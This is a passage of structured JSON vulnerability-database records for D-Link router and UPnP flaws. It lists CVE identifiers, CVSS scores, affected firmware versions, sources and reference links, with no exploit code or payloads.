"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27803"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/wpa"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/minidlna"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275"
},
{
"date": "2020-06-08T00:00:00",
"db": "VULHUB",
"id": "VHN-165399"
},
{
"date": "2020-06-08T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"date": "2021-05-19T14:10:26",
"db": "PACKETSTORM",
"id": "162672"
},
{
"date": "2020-09-15T17:05:32",
"db": "PACKETSTORM",
"id": "159172"
},
{
"date": "2021-02-04T21:34:49",
"db": "PACKETSTORM",
"id": "161288"
},
{
"date": "2021-02-16T23:41:17",
"db": "PACKETSTORM",
"id": "161444"
},
{
"date": "2021-02-12T17:29:06",
"db": "PACKETSTORM",
"id": "161397"
},
{
"date": "2021-04-28T19:12:00",
"db": "PACKETSTORM",
"id": "169049"
},
{
"date": "2020-12-28T20:12:00",
"db": "PACKETSTORM",
"id": "168951"
},
{
"date": "2020-06-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"date": "2020-06-08T17:15:09.973000",
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-08T00:00:00",
"db": "CERT/CC",
"id": "VU#339275"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULHUB",
"id": "VHN-165399"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"date": "2020-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"date": "2024-04-08T22:50:14.587000",
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Universal Plug and Play (UPnP) SUBSCRIBE can be abused to send traffic to arbitrary destinations",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
}
],
"trust": 0.6
}
}
VAR-202307-2198
Vulnerability from variot - Updated: 2024-06-06 23:11Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. D-Link Systems, Inc. of DIR-885L An incorrect authentication vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DIR-885L is a wireless router made by China D-Link Company. The vulnerability stems from the lack of effective authentication in phpcgi
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202307-2198",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-885l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02"
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-885l firmware 1.02"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l fw102b01",
"scope": null,
"trust": 0.6,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-885l_firmware:1.02:b01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"cve": "CVE-2023-36090",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2023-65168",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-36090",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-36090",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2023-65168",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. D-Link Systems, Inc. of DIR-885L An incorrect authentication vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DIR-885L is a wireless router made by China D-Link Company. The vulnerability stems from the lack of effective authentication in phpcgi",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-36090"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-36090",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2023-65168",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"id": "VAR-202307-2198",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
]
},
"last_update_date": "2024-06-06T23:11:27.436000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DIR-885L Authentication Bypass Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/453471"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Illegal authentication (CWE-863) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/en/support"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-36090"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"date": "2024-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"date": "2023-07-31T14:15:10.533000",
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-65168"
},
{
"date": "2024-01-18T06:40:00",
"db": "JVNDB",
"id": "JVNDB-2023-021075"
},
{
"date": "2024-06-05T21:15:11.203000",
"db": "NVD",
"id": "CVE-2023-36090"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DIR-885L\u00a0 Fraudulent Authentication Vulnerability in Firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-021075"
}
],
"trust": 0.8
}
}
VAR-202309-0018
Vulnerability from variot - Updated: 2024-06-06 22:58A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. D-Link Systems, Inc. of dar-8000-10 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0018",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-8000-10",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20230819"
},
{
"model": "dar-8000-10",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dar-8000-10 firmware 20230819 and earlier"
},
{
"model": "dar-8000-10",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dar-8000-10",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20230819",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000-10:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"cve": "CVE-2023-4711",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.6,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-4711",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-4711",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2023-4711",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. D-Link Systems, Inc. of dar-8000-10 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "VULMON",
"id": "CVE-2023-4711"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-4711",
"trust": 2.7
},
{
"db": "VULDB",
"id": "238574",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548",
"trust": 0.8
},
{
"db": "VULMON",
"id": "CVE-2023-4711",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"id": "VAR-202309-0018",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5
},
"last_update_date": "2024-06-06T22:58:19.435000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://vuldb.com/?id.238574"
},
{
"trust": 1.9,
"url": "https://github.com/tinkanet/cve/blob/main/rce.md"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.238574"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4711"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"date": "2023-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"date": "2023-09-01T20:15:08.310000",
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2023-4711"
},
{
"date": "2023-12-13T07:36:00",
"db": "JVNDB",
"id": "JVNDB-2023-011548"
},
{
"date": "2024-06-05T21:15:13.273000",
"db": "NVD",
"id": "CVE-2023-4711"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0dar-8000-10\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-011548"
}
],
"trust": 0.8
}
}
VAR-202309-0939
Vulnerability from variot - Updated: 2024-06-06 19:22** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced
Show details on source website{
"@context": {
